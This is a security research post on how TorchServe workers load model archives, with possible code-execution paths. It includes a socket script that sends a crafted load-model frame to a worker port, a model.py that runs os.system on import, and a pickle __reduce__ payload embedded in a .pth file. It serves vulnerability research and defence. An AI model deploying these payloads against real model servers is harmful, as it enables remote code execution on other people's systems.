6 min read

TorchServe Workers Code Execution

A dive into how TorchServe workers work and some potential paths for code execution in their context.

This is some informal writing about how TorchServe workers work: a specific, but heavily caveated, path to remote code execution, and some thoughts on how TorchScript pickles can or cannot be used for code execution. When you make a request to the API to load a new model, this in turn triggers a worker. The worker is the component that actually loads and executes the model. By default the worker is Python-based; there is also a C/C++ worker that will run if you have that backend compiled.

When launching a model normally, you would send an API call like this:

 curl -X POST "http://localhost:8081/models?url=injected2.mar&initial_workers=1&runtime=python"
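
The same registration call can be made from Python with requests; this is just a direct translation of the curl line above (management API on its default port 8081):

import requests

# Register the archive and spin up one Python worker via the management API
resp = requests.post(
    "http://localhost:8081/models",
    params={"url": "injected2.mar", "initial_workers": 1, "runtime": "python"},
)
print(resp.status_code, resp.text)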

Before talking about interacting with the worker, let's take a look at the contents of the .mar file, since it is important. The contents will differ depending on how you built the archive, but here is an example:

.
├── MAR-INF
│   └── MANIFEST.json
├── index_to_name.json
├── model.py
└── squeezenet_injected.pth

2 directories, 4 files

The model.py file contains the model/handler code, and you can pretty easily put arbitrary Python code you want executed in here. The .pth file is a serialized model file; there are multiple different model formats you can use, and the .pth format is one where it is easy to inject malicious code via pickle. The key file here is the MANIFEST.json file, which looks like this:

{
  "createdOn": "31/03/2024 15:24:58",
  "runtime": "python",
  "model": {
    "modelName": "injected2",
    "serializedFile": "squeezenet_injected.pth",
    "handler": "image_classifier",
    "modelFile": "model.py",
    "modelVersion": "1.0"
  },
  "archiverVersion": "0.10.0"
}

These values are used as part of model execution; they point to the other files in the archive. There are a handful of distinct code paths you can follow by changing these values in different ways, which we will talk about later.
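
A .mar is normally produced with the torch-model-archiver tool, but since it is just a zip archive (as described below), the example layout above can also be assembled by hand. A rough sketch, assuming the files listed earlier exist in the current directory:

import json
import zipfile

# The manifest from above, written into the MAR-INF/ directory of the zip
manifest = {
    "createdOn": "31/03/2024 15:24:58",
    "runtime": "python",
    "model": {
        "modelName": "injected2",
        "serializedFile": "squeezenet_injected.pth",
        "handler": "image_classifier",
        "modelFile": "model.py",
        "modelVersion": "1.0",
    },
    "archiverVersion": "0.10.0",
}

with zipfile.ZipFile("injected2.mar", "w") as mar:
    mar.writestr("MAR-INF/MANIFEST.json", json.dumps(manifest, indent=2))
    for name in ("model.py", "squeezenet_injected.pth", "index_to_name.json"):
        mar.write(name)  # assumes these files exist locally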

TorchServe will take this .mar file, which is a zip, and unzip it into a folder under /var. It then goes into that folder and, very importantly, adds that location to the PYTHONPATH. Once this happens it launches a worker process like the one below, binding a socket to a port at 9000 or above, incrementing by one each time a worker process is launched.

 /opt/anaconda3/bin/python /opt/anaconda3/lib/python3.11/site-packages/ts/model_service_worker.py --sock-type tcp --port 9039 --metrics-config /opt/anaconda3/lib/python3.11/site-packages/ts/configs/metrics.yaml

If the runtime API flag is set to LSP instead of the default of python, TorchServe will attempt to launch the C++ backend. This launches a command like the one shown below; this path has not been investigated as deeply.

2024-04-06T17:07:59,607 [DEBUG] W-9000-mnist_base_1.0 org.pytorch.serve.wlm.WorkerLifeCycle - Worker cmdline: [/home/venv/lib/python3.9/site-packages/ts/cpp/bin/model_worker_socket, --sock_type, unix, --sock_name, /tmp/.ts.sock.9000, --runtime_type, LSP, --model_dir, /tmp/models/9e6fe30b95c0409888d1cde1de411726, --metrics_config_path, /home/venv/lib/python3.9/site-packages/ts/configs/metrics.yaml]

During testing, the service worker only seemed to respond to commands when it was not already in use by another connection. This suggests that the techniques described below only work if you interact with an idle worker that has not yet been engaged.

The Python worker exposes a port on localhost that expects a socket connection carrying a binary payload. The payload can start with one of two command bytes:

  • b"I" -> Inference Request
  • b"L" -> Command Request

For our purposes, we care more about the second one, which is the command that loads in a new model. You can find the format of the frame here: https://github.com/pytorch/serve/blob/4f9070802a666cdffc732b07a2b2870af0616d9a/ts/protocol/otf_message_handler.py#L202

"""
MSG Frame Format:

| cmd value |
| int model-name length | model-name value |
| int model-path length | model-path value |
| int batch-size length |
| int handler length | handler value |
| int gpu id |
| bool limitMaxImagePixels |

:param conn:
:return:
"""

The model name value is simply the name of the model. The model path is important: it is where the service will look for the manifest file. Finally, the handler value is important because it is what is used to import a Python module via importlib. The other values are not important in the context of getting code execution.

The binary payload starts with one of the two command bytes above. Each variable-length field that follows is encoded as a 4-byte big-endian length followed by a value of that many bytes.

So for example, the model name "injected10" has a length of 10, which is 0xa in hex, so that section would be \x00\x00\x00\x0ainjected10.

Here is an example of a string that would load in the model in /tmp/aaaabbbb with a handler of image_classifier:

'L\x00\x00\x00\x0ainjected10\x00\x00\x00\x0d/tmp/aaaabbbb\x00\x00\x00\x01\x00\x00\x00\x10image_classifier\x00\x00\x00\x01\x00\x00\x00\x00\x01'

Here is what the input looks like once decoded by the worker:

{'modelName': bytearray(b'injected10'), 'modelPath': bytearray(b'/tmp/aaaabbbb'), 'batchSize': 1, 'handler': bytearray(b'image_classifier'), 'gpu': 1, 'envelope': bytearray(b''), 'limitMaxImagePixels': True}
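
To make the length-prefix layout concrete, here is a small helper (my own sketch, not TorchServe code) that rebuilds the same frame field by field with struct:

import struct

def length_prefixed(value: bytes) -> bytes:
    # Variable-length fields are a 4-byte big-endian length followed by the bytes
    return struct.pack(">i", len(value)) + value

def build_load_frame(model_name, model_path, handler,
                     batch_size=1, gpu_id=1, envelope=b"",
                     limit_max_image_pixels=True):
    frame = b"L"                              # 'L' selects the load-model command
    frame += length_prefixed(model_name.encode())
    frame += length_prefixed(model_path.encode())
    frame += struct.pack(">i", batch_size)    # batch size is a plain 4-byte int
    frame += length_prefixed(handler.encode())
    frame += struct.pack(">i", gpu_id)        # gpu id is a plain 4-byte int
    frame += length_prefixed(envelope)        # empty envelope in the example above
    frame += struct.pack("?", limit_max_image_pixels)
    return frame

print(build_load_frame("injected10", "/tmp/aaaabbbb", "image_classifier"))

Running this should reproduce the byte string shown above.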

The following is a short Python script which sends this payload to the worker's port:

import socket

HOST = '127.0.0.1'
PORT = 9039  # the worker's port, as seen in the launch command above

# Same load-model frame as shown above (model path /tmp/aaaabbbb)
payload = (b'L\x00\x00\x00\x0ainjected10'
           b'\x00\x00\x00\x0d/tmp/aaaabbbb'
           b'\x00\x00\x00\x01'
           b'\x00\x00\x00\x10image_classifier'
           b'\x00\x00\x00\x01\x00\x00\x00\x00\x01')

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.sendall(payload)
response = s.recv(2048)
print(f"Received {response!r}")
s.close()

The handler part of this input is very important: the value that is passed here needs to be loadable as a module:

try:
    module, function_name = self._load_handler_file(handler)
except ImportError:
    module = self._load_default_handler(handler)

https://github.com/pytorch/serve/blob/8450a2e4bca4edc3397b40bea9dd33595962d06a/ts/model_loader.py#L107C8-L110C57

Those two helpers ultimately reduce to:

module = importlib.import_module(module_name)
# or
module = importlib.import_module(module_name, "ts.torch_handler")

Basically, the value you pass here must be loadable directly as a module or be part of ts.torch_handler, otherwise execution will stop. image_classifier lives inside ts.torch_handler here. It is important to understand that the fact that TorchServe adds the extracted folder to the PYTHONPATH is what makes this work normally, but this is a luxury that you may not have if you are trying to exploit this from scratch.

So right here, if you are able to place a malicious module somewhere on the PYTHONPATH and pass that module name into the handler part of this input, you can get it to trigger; that scenario is unlikely, however.

Assuming this import succeeds, execution then continues down one of two distinct flows.

Scenario 1 - The manifest file references a modelFile

If the MANIFEST.json contains a modelFile, the following code will execute:

if model_file:
    logger.debug("Loading eager model")
    self.model = self._load_pickled_model(
        model_dir, model_file, self.model_pt_path
    )
    self.model.to(self.device)
    self.model.eval()

https://github.com/pytorch/serve/blob/8450a2e4bca4edc3397b40bea9dd33595962d06a/ts/torch_handler/base_handler.py#L90

This code takes the modelFile and attempts to import it. Again, if the folder is part of the PYTHONPATH it will import properly, giving you code execution; if it is not, you get an ImportError. If you pass in a model file that is unrelated to your MAR file but is on the PYTHONPATH, it will load it, although there is a check in place to make sure that file contains only a single class definition. If you are able to get past this check, it will then load the serialized model defined in the manifest, which can contain a malicious pickle.
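
As a hypothetical illustration (all names are made up), a model.py shaped like this would run its module-level code the moment the worker imports it, while still passing the single-class check:

# model.py - hypothetical example; module-level code runs as soon as the
# worker imports this file, before any model object is even constructed
import os
import torch.nn as nn

os.system("id > /tmp/model_import_ran")   # illustrative payload, fires on import

class SqueezeNetWrapper(nn.Module):       # a single class definition, to satisfy
    def __init__(self):                   # the check described above
        super().__init__()
        self.net = nn.Identity()

    def forward(self, x):
        return self.net(x)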

To summarize here, if you keep modelFile in the manifest:

  • The value that is in the "handler" section of the manifest needs to be importable via the PYTHONPATH.
    • If your malicious code is on the PYTHONPATH, you can use this to get code execution.
  • If your code is not on the PYTHONPATH, you must pass in a module that is on the PYTHONPATH and contains only a single class.
    • Once you do this, the worker loads your model with torch.load; if you inject a payload into that pickle it will execute (a sketch of such a payload follows after this list).
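
A minimal sketch of what such a pickle payload could look like, using the classic __reduce__ trick (the file name matches the example archive; the command is hypothetical):

import os
import torch

class MaliciousPayload:
    # Objects with a custom __reduce__ are rebuilt by calling the returned
    # callable with the returned arguments during unpickling.
    def __reduce__(self):
        return (os.system, ("id > /tmp/pwned",))  # illustrative payload command

# torch.save serializes with pickle, so the payload rides inside the .pth
torch.save({"state_dict": MaliciousPayload()}, "squeezenet_injected.pth")

# On the loading side, torch.load() unpickles the object and os.system runs.
# Note that newer PyTorch releases default to weights_only=True, which blocks this.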

Scenario 2 - The manifest file does not reference a modelFile

If the modelFile parameter is empty, the worker will attempt to load the serializedFile directly. The path this follows depends on the extension of the model file. It does not appear to be possible to load a .pth file directly using this flow, which would have been easy code execution. It does load TorchScript models, however:

elif self.model_pt_path.endswith(".pt"):
    self.model = self._load_torchscript_model(self.model_pt_path)
    self.model.eval()

https://github.com/pytorch/serve/blob/8450a2e4bca4edc3397b40bea9dd33595962d06a/ts/torch_handler/base_handler.py#L90

This unfortunately does not really lead anywhere, though. TorchScript models contain pickles, but these are not real Python pickles. TorchScript defines a serialization protocol that is Python-like, but is not directly Python. It is described here: https://github.com/pytorch/pytorch/blob/main/torch/csrc/jit/docs/serialization.md
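
For context, a TorchScript .pt file produced by torch.jit.save is itself a zip archive, which you can inspect directly (a quick sketch, using the file name from the example below):

import zipfile

# The pickles inside (data.pkl, constants.pkl) are read by TorchScript's own
# unpickler rather than Python's pickle module, so arbitrary globals like
# builtins.eval are rejected at load time.
with zipfile.ZipFile("trythis2.pt") as zf:
    for name in zf.namelist():
        print(name)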

If you attempt to load in a model that has a payload injected into it you will see an error such as this:

import torch
loaded_compiled_model = torch.jit.load('trythis2.pt')

RuntimeError: 
Unknown type name 'builtins.eval':
builtins.eval

This is because there is no eval builtin in TorchScript. You can see what the available builtins are here: https://pytorch.org/docs/stable/jit_builtin_functions.html
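
You can see the same restriction from the compilation side; a small sketch, separate from the loading error above:

import torch

def uses_eval(code: str):
    return eval(code)

try:
    torch.jit.script(uses_eval)   # compile to TorchScript, don't run it
except Exception as exc:          # eval is not a TorchScript builtin, so compilation fails
    print(type(exc).__name__, exc)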

As far as I know, there is not a lot of research on injecting malicious payloads into TorchScript modules. Looking at the builtins, I don't know whether it would be possible.